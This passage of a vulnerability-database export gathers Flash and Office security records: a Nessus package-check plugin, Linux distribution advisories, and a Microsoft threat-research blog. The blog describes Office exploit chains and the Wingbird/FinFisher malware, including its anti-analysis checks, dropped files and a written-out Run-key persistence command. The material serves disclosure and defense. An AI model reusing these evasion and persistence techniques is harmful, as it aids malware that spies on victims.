value:\"https://www.suse.com/security/cve/CVE-2016-1033/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1096/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1097/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1098/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1099/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1100/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1101/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1102/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1103/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1104/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1105/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1106/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1107/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1108/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1109/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1110/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-4108/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-4109/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-4110/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-4111/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-4112/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-4113/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-4114/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-4115/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-4116/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-4117/\");\n # https://www.suse.com/support/update/announcement/2016/suse-su-20161305-1/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e82b824a\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12-SP1 :\n\nzypper in -t patch SUSE-SLE-WE-12-SP1-2016-772=1\n\nSUSE Linux Enterprise Workstation Extension 12 :\n\nzypper in -t patch SUSE-SLE-WE-12-2016-772=1\n\nSUSE Linux Enterprise Desktop 12-SP1 :\n\nzypper in -t patch SUSE-SLE-DESKTOP-12-SP1-2016-772=1\n\nSUSE Linux Enterprise Desktop 12 :\n\nzypper in -t patch SUSE-SLE-DESKTOP-12-2016-772=1\n\nTo bring your system up-to-date, use 'zypper patch'.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(0|1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP0/1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"flash-player-11.2.202.621-130.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"flash-player-gnome-11.2.202.621-130.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"flash-player-11.2.202.621-130.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"flash-player-gnome-11.2.202.621-130.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2022-01-17T19:06:33", "description": "### Background\n\nThe Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Adobe Flash Player. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process, cause a Denial of Service condition, obtain sensitive information, or bypass security restrictions. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Adobe Flash Player users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \"www-plugins/adobe-flash-11.2.202.626\"", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-06-18T00:00:00", "type": "gentoo", "title": "Adobe Flash Player: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1019", "CVE-2016-4117", "CVE-2016-4120", "CVE-2016-4121", "CVE-2016-4160", "CVE-2016-4161", "CVE-2016-4162", "CVE-2016-4163", "CVE-2016-4171"], "modified": "2016-06-18T00:00:00", "id": "GLSA-201606-08", "href": "https://security.gentoo.org/glsa/201606-08", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mssecure": [{"lastseen": "2018-01-16T03:40:26", "description": "The Office 365 Threat Research team has seen an uptick in the use of Office exploits in attacks across various industry sectors in recent months. In this blog, we will review several of these exploits, including a group of Office moniker exploits that attackers have used in targeted as well as crimeware attacks. We will also describe the payloads associated with these exploits andhighlight our research into a particularly sophisticated piece of malware. Finally, we will demonstrate how [Office 365 Advanced Threat Protection](<https://products.office.com/en-us/exchange/online-email-threat-protection?ocid=cx-blog-mmpc>), [Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc>), and [Windows Defender Exploit Guard ](<https://blogs.technet.microsoft.com/mmpc/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware?ocid=cx-blog-mmpc>)protect customers from these exploits.\n\n## Exploit attacks in Fall 2017\n\nThe discovery and public availability of a few Office exploits in the last six months led to these exploits gaining popularity among crimeware and targeted attackers alike. While crimeware attackers stick to payloads like [ransomware](<https://www.microsoft.com/en-us/wdsi/threats/ransomware>) and [info stealers](<https://blogs.technet.microsoft.com/mmpc/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/>) to attain financial gain or information theft, more sophisticated attackers clearly distinguish themselves by using advanced and multi-stage implants.\n\nThe Office 365 Threat Research team has been closely monitoring these attacks. The Microsoft Threat Intelligence Center (MSTIC) backs up our threat research with premium threat intelligence services that we use to correlate and track attacks and the threat actors behind them.\n\n### CVE-2017-0199\n\n[CVE-2017-0199](<https://nvd.nist.gov/vuln/detail/CVE-2017-0199>) is a remote code execution (RCE) vulnerability in Microsoft Office allows a remote attacker to take control of a vulnerable machine if the user chooses to ignore protected view warning message. The vulnerability, which is a logic bug in the URL moniker that executes the HTA content using the _htafile_ OLE object, was fixed in [April 2017 security updates](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/42b8fa28-9d09-e711-80d9-000d3a32fc99>).\n\n\n\n_Figure 1. CVE-2017-0199 exploit code_\n\nEver since [FireEye blogged](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>) about the vulnerability, we have identified numerous attacks using this exploit. The original exploit was used in limited targeted attacks, but soon after, commodity crimeware started picking them up from the publicly available exploit generator toolkits. As shown in Figure 2, the creator and _lastModifiedBy_ attributes help identify the use of such toolkits in generating exploit documents.\n\n\n\n_Figure 2. Exploit kit identifier_\n\nA slight variation of this exploit, this time in script moniker, was also released. When activated, this exploit can launch [scriptlets](<https://msdn.microsoft.com/en-us/library/office/aa189871\\(v=office.10\\).aspx>) (which consist of HTML code and script) hosted on a remote server. A proof-of-concept (PoC) made publicly available used a Microsoft PowerPoint Slideshow (PPSX) file to activate the script moniker and execute a remote code, as shown in Figure 3.\n\n\n\n_Figure 3. PPSX activation for script moniker_\n\n### CVE-2017-8570\n\nThe [July 2017 security update](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/f2b16606-4945-e711-80dc-000d3a32fc99>) from Microsoft included a fix for another variation of the CVE-2017-0199 exploit, [CVE-2017-8570](<https://nvd.nist.gov/vuln/detail/CVE-2017-8750>), which was discovered in URL moniker that, similar to HTA files, can launch scriptlets hosted on a remote server. Even though the vulnerability was not exploited as zero-day, the [public availability](<https://github.com/Ring0Mob/CVE-2017-8570>) of exploit toolkit created a wave of malicious PPSX attachments.\n\n### CVE-2017-8759\n\nIn September 2017, [FireEye discovered](<https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html>) another zero-day exploit used in targeted attacks. The [CVE-2017-8759 exploit](<https://blogs.technet.microsoft.com/mmpc/2017/09/12/exploit-for-cve-2017-8759-detected-and-neutralized/>) takes advantage of a code injection vulnerability in .Net Framework while parsing WSDL definition using SOAP moniker. The vulnerability was fixed in the [September 2017 security update](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/5984735e-f651-e711-80dd-000d3a32fc99>). The original exploit used an HTA file similar to CVE-2017-0199 to execute the attacker code in vulnerable machines. This exploit piqued our interest because it delivered one of the most complex and multiple VM-layered malware, FinFisher, whose techniques we discuss in the succeeding section.\n\nThe CVE-2017-8759 exploit soon got ported to PPSX file. Figure 4 below shows an example of the exploit.\n\n\n\n_Figure 4. CVE-2017-8759 exploit_\n\n### CVE-2017-11826\n\nFinally, onSeptember 28,2017, [Qihoo 360](<https://360coresec.blogspot.dk/2017/10/new-office-0day-cve-2017-11826.html>) identified an RTF file in targeted attacks that exploited a memory corruption vulnerability in Microsoft Office. The vulnerability exists in the way Office parses objects within nested Office tags and was fixed in the [October 2017 security update](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/313ae481-3088-e711-80e2-000d3a32fc99>). The forced address space layout randomization (ASLR) prevented the exploit from running in Office 2013 and above. Figure 5 shows the nested tags from the original exploit that led to the bug.\n\n\n\n_Figure 5. CVE-2017-11826 exploit_\n\n## Payloads\n\nExcept for the memory, corruption exploit CVE-2017-11826, the exploits discussed in this blog pull the malware payload from remote locations, which could make it difficult for antivirus and sandboxes to reliably detect these exploits. Additionally, the public availability of scripts that generate exploit templates could make it challenging for incident responders.\n\nAs cited above, these exploits were used in both commodity and targeted attacks. Attackers attempt to bypass AV engine defenses using different obfuscation techniques. Here are some of the obfuscation techniques used in attacks that we recently analyzed:\n\n * Attackers used HLFL as element type in the malicious RTF attachment. This element is not supported in RTF official specification but serves as an effective obfuscation for static detections.\n\n\n\n * Similarly, we have seen attackers using ATNREF and MEQARR elements in malicious RTF attachments.\n\n\n\nIn most of the attacks we analyzed, the exploits used PowerShell to download and execute malware payloads, which are usually crimeware samples like ransomware or info stealers.\n\n\n\n_Figure 6. PowerShell payload from the HTA file_\n\nHowever, every now and then, we stumble upon an interesting piece of malware that particularly catches our attention. One such malware is Wingbird, also known as FinFisher, which was used in one of the targeted attacks using the CVE-2017-8759 exploit.\n\n### WingBird (also known as FinFisher)\n\n[Wingbird](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/Entry.aspx?Name=Backdoor:Win32/Wingbird.A!dha>) is an advanced piece of malware that shares characteristics with a government-grade commercial surveillance software, FinFisher. The activity group [NEODYMIUM](<https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/>) is known to use this malware in their attack campaigns.\n\nThe group behind WingBird has proven to be highly capable of using zero-day exploits in their attacks, as mentioned in our [previous blog post on CVE-2017-8759](<https://blogs.technet.microsoft.com/mmpc/2017/09/12/exploit-for-cve-2017-8759-detected-and-neutralized/>). So far, we have seen the group use the exploits below in campaigns. These are mostly in line with the findings of Kaspersky Labs, which they documented in a [blog](<https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/>):\n\n * CVE-2015-5119 (Adobe Flash)\n * CVE-2016-4117 (Adobe Flash)\n * CVE-2017-8759 (Microsoft Office)\n * CVE-2017-11292 (Adobe Flash)\n\nThe interesting part of this malware is the use of spaghetti code, multiple virtual machines, and lots of anti-debug and anti-analysis techniques. Due to the complexity of the threat, it could take analysts some time to completely unravel its functionality. Heres a summary of interesting tidbits, which we will expand in an upcoming detailed report on Wingbird.\n\nThe Wingbird malware goes through many stages of execution and has at least four VMs protecting the malware code. The first few stages are loaders that can probe if it is being run in virtualized or debugged environments. We found at least 12 different checks to evade the malwares execution in these environments. The most effective ones are:\n\n * Sandbox environment checks\n * Checks if the malware is executed under the root folder of a drive\n * Checks if the malware file is readable from an external source and if execution path contains the MD5 of its own contents\n\n\n\n * Fingerprinting check\n * Checks if the machine GUID, Windows product ID, and system Bios are from well-known sources\n * VM detection\n * Checks if the machine hardware IDs are _VmBus_ in case of HyperV, or _VEN_15AD_ in case of VMware, etc.\n * Debugger detection\n * Detects debugger and tries to kill it using undocumented APIs and information classes (specifically _ThreadHideFromDebugger_, _ProcessDebugPort_, _ProcessDebugObjectHandle_)\n\n\n\nThe latter stages act as an installation program that drops the following files on the disk and installs the malware based on the startup command received from the previous stage:\n\n * _ [randomName].cab_ -Encrypted configuration file\n * _ setup.cab_ - The last PE code section of the setup module; content still unknown\n * _ d3d9.dll_ -Malware loader used on system with restricted privileges; the module is protected by a VM\n * _ aepic.dll_ (or other name) - Malware loader used on admin privileged systems; executed from (and injected into) a faked service; protected by a VM\n * _ msvcr90.dll_ - Malware loader DLL injected into explorer.exe or winlogon.exe process; protected by a VM\n * _ [randomName].7z_ - Encrypted network plugin, used to spy the victim network communications\n * _ wsecedit.rar_ - Main malware dropped executable, protected by a VM\n\nIn the sample we analyzed, the command was 3, which led the malware to create a global event, _0x0A7F1FFAB12BB2_, and drop malware components under a folder located in [_%ProgramData%_](<https://www.microsoft.com/en-us/wdsi/help/folder-variables#programdata>), or in the _[%APPDATA%](<https://www.microsoft.com/en-us/wdsi/help/folder-variables#appdata>)_ folder. If the malware is running with restricted privileges, the persistence is achieved by setting the RUN key with the value below. The name of the key is taken from the encrypted configuration file.\n\n_HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run_ \n_ Value: \"{Random value taken from config file}\"_ \n_ With data: \"C:\\WINDOWS\\SYSTEM32\\RUNDLL32.EXE C:\\PROGRAMDATA\\AUDITAPP\\D3D9.DLL, CONTROL_RUN\"_\n\nIf the startup command is 2, the malware copies explorer.exe in the local installation directory, renames _d3d9.dll_ to _uxtheme.dll_, and creates a new _explorer.exe_ process that loads the malware DLL in memory using the DLL sideloading technique.\n\nAll of Wingbirds plugins are stored in its resource section and provide the malware various capabilities, including stealing sensitive information, spying on internet connection, or even diverting SSL connections.\n\nGiven the complex nature of the threat, we will provide more detailed analysis of the Wingbird protection mechanism and capabilities in an upcoming blog post.\n\n## Detecting Office exploit attacks with Office 365 ATP and Windows Defender Suite\n\nMicrosoft [Office 365 Advanced Threat Protection](<https://products.office.com/en-us/exchange/online-email-threat-protection?ocid=cx-blog-mmpc>) blocks attacks that use these exploits based on the detection of malicious behaviors. Office 365 ATP helps secure mailboxes against email attack by blocking emails with unsafe attachments, malicious links, and linked-to files leveraging time-of-click protection. SecOps personnel can see ATP behavioral detections like below in Office 365s Threat Explorer page:\n\n\n\n\n\n_Figure 7. Office 365 ATP detection_\n\nCustomers using [Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc>) can also see multiple alerts raised based on the activities performed by the exploit on compromised machines. Windows Defender Advanced ATP is a post-breach solution that alerts SecOps personnel about hostile activity. Windows Defender ATP uses rich security data, advanced behavioral analytics, and machine learning to detect attacks.\n\n\n\n_Figure 8. Windows Defender ATP alert_\n\nIn addition, enterprises can block malicious documents using [Windows Defender Exploit Guard](<https://blogs.technet.microsoft.com/mmpc/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware?ocid=cx-blog-mmpc>), which is part of the defense-in-depth protection in [Windows 10 Fall Creators Update](<https://blogs.windows.com/business/2017/06/27/announcing-end-end-security-features-windows-10/>). The Attack Surface Reduction (ASR) feature in Windows Defender Exploit Guard uses a set of built-in intelligence that can block malicious behaviors observed in malicious documents. ASR rules can also be turned on to block malicious attachments from being run or launched from Microsoft Outlook or webmail (such as Gmail, Hotmail, or Yahoo!).\n\n\n\n_Figure 9. Windows Defender Exploit Guard detection_\n\nCrimeware and targeted activity groups are always on the lookout for attack vectors to infiltrate systems and networks and deploy different kinds of payloads, from commodity to advanced implants. These attack vectors include Office exploits, which we observed in multiple attack campaigns. The availability of open-source and off-the-shelf exploit builders helps drive this trend.\n\nAtMicrosoft, we dont stop working to protect our customers mailboxes. Our global network of expert research teams continuously monitors the threat landscape for new malware campaigns, exploits, and attack methods. Our end-to-end defense suite includes Office 365 ATP, Windows Defender ATP, and Windows Defender Exploit Guard, among others, which work together to provide a holistic protection for individuals and enterprises.", "edition": 2, "cvss3": {}, "published": "2017-11-21T13:46:01", "type": "mssecure", "title": "Office 365 Advanced Threat Protection defense for corporate networks against recent Office exploit attacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5119", "CVE-2016-4117", "CVE-2017-0199", "CVE-2017-1099", "CVE-2017-11292", "CVE-2017-11826", "CVE-2017-8570", "CVE-2017-8750", "CVE-2017-8759"], "modified": "2017-11-21T13:46:01", "id": "MSSECURE:A133B2DDF50F8BE904591C1BB592991A", "href": "https://cloudblogs.microsoft.com/microsoftsecure/2017/11/21/office-365-advanced-threat-protection-defense-for-corporate-networks-against-recent-office-exploit-attacks/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "mageia": [{"lastseen": "2022-04-18T11:19:34", "description": "Adobe Flash Player 11.2.202.621 contains fixes to critical security vulnerabilities found in earlier versions that could potentially allow an attacker to take control of the affected system. This update resolves type confusion vulnerabilities that could lead to code execution (CVE-2016-1105, CVE-2016-4117). This update resolves use-after-free vulnerabilities that could lead to code execution (CVE-2016-1097, CVE-2016-1106, CVE-2016-1107, CVE-2016-1108, CVE-2016-1109, CVE-2016-1110, CVE-2016-4108, CVE-2016-4110). This update resolves a heap buffer overflow vulnerability that could lead to code execution (CVE-2016-1101). This update resolves a buffer overflow vulnerability that could lead to code execution (CVE-2016-1103). This update resolves memory corruption vulnerabilities that could lead to code execution (CVE-2016-1096, CVE-2016-1098, CVE-2016-1099, CVE-2016-1100, CVE-2016-1102, CVE-2016-1104, CVE-2016-4109, CVE-2016-4111, CVE-2016-4112, CVE-2016-4113, CVE-2016-4114, CVE-2016-4115). This update resolves a vulnerability in the directory search path used to find resources that could lead to code execution (CVE-2016-4116). Adobe reports that an exploit for CVE-2016-4117 exists in the wild. \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-05-12T20:00:19", "type": "mageia", "title": "Updated flash-player-plugin packages fix security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1096", "CVE-2016-1097", "CVE-2016-1098", "CVE-2016-1099", "CVE-2016-1100", "CVE-2016-1101", "CVE-2016-1102", "CVE-2016-1103", "CVE-2016-1104", "CVE-2016-1105", "CVE-2016-1106", "CVE-2016-1107", "CVE-2016-1108", "CVE-2016-1109", "CVE-2016-1110", "CVE-2016-4108", "CVE-2016-4109", "CVE-2016-4110", "CVE-2016-4111", "CVE-2016-4112", "CVE-2016-4113", "CVE-2016-4114", "CVE-2016-4115", "CVE-2016-4116", "CVE-2016-4117"], "modified": "2016-05-12T20:00:19", "id": "MGASA-2016-0173", "href": "https://advisories.mageia.org/MGASA-2016-0173.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:41", "description": "- CVE-2016-1096:\n\nMemory corruption. Mateusz Jurczyk and Natalie Silvanovich of Google\nProject Zero.\n\n- CVE-2016-1097:\n\nUse-after-free. Wen Guanxing from Pangu LAB, working with the Chromium\nVulnerability Rewards Program .\n\n- CVE-2016-1098:\n\nMemory corruption. Wen Guanxing from Pangu LAB.\n\n- CVE-2016-1099:\n\nMemory corruption. Wen Guanxing from Pangu LAB.\n\n- CVE-2016-1100:\n\nMemory corruption. Wen Guanxing from Pangu LAB.\n\n- CVE-2016-1101:\n\nHeap buffer overflow. Mateusz Jurczyk and Natalie Silvanovich of Google\nProject Zero.\n\n- CVE-2016-1102:\n\nMemory corruption. Mateusz Jurczyk and Natalie Silvanovich of Google\nProject Zero.\n\n- CVE-2016-1103:\n\nBuffer overflow. Mateusz Jurczyk and Natalie Silvanovich of Google\nProject Zero.\n\n- CVE-2016-1104:\n\nMemory corruption. Mateusz Jurczyk and Natalie Silvanovich of Google\nProject Zero.\n\n- CVE-2016-1105:\n\nType confusion. Natalie Silvanovich of Google Project Zero.\n\n- CVE-2016-1106:\n\nUse-after-free. Natalie Silvanovich of Google Project Zero.\n\n- CVE-2016-1107:\n\nUse-after-free. NSFOCUS Security Team.\n\n- CVE-2016-1108:\n\nUse-after-free. Nicolas Joly of Microsoft Vulnerability Research.\n\n- CVE-2016-1109:\n\nUse-after-free. Nicolas Joly of Microsoft Vulnerability Research.\n\n- CVE-2016-1110:\n\nUse-after-free. Nicolas Joly of Microsoft Vulnerability Research.\n\n- CVE-2016-4108:\n\nUse-after-free. Natalie Silvanovich of Google Project Zero.\n\n- CVE-2016-4109:\n\nMemory corruption. willJ of Tencent PC Manager.\n\n- CVE-2016-4110:\n\nUse-after-free. willJ of Tencent PC Manager.\n\n- CVE-2016-4111:\n\nMemory corruption. willJ of Tencent PC Manager.\n\n- CVE-2016-4112:\n\nMemory corruption. willJ of Tencent PC Manager.\n\n- CVE-2016-4113:\n\nMemory corruption. willJ of Tencent PC Manager.\n\n- CVE-2016-4114:\n\nMemory corruption. willJ of Tencent PC Manager.\n\n- CVE-2016-4115:\n\nMemory corruption. willJ of Tencent PC Manager.\n\n- CVE-2016-4116:\n\nVulnerability in the directory search path used to find resources.\nLadislav Baco of CSIRT.SK.\n\n- CVE-2016-4117:\n\nType confusion vulnerability that could lead to code execution. Genwei\nJiang of FireEye, Inc.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-12T00:00:00", "type": "archlinux", "title": "lib32-flashplugin: arbitrary code execution", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1100", "CVE-2016-1109", 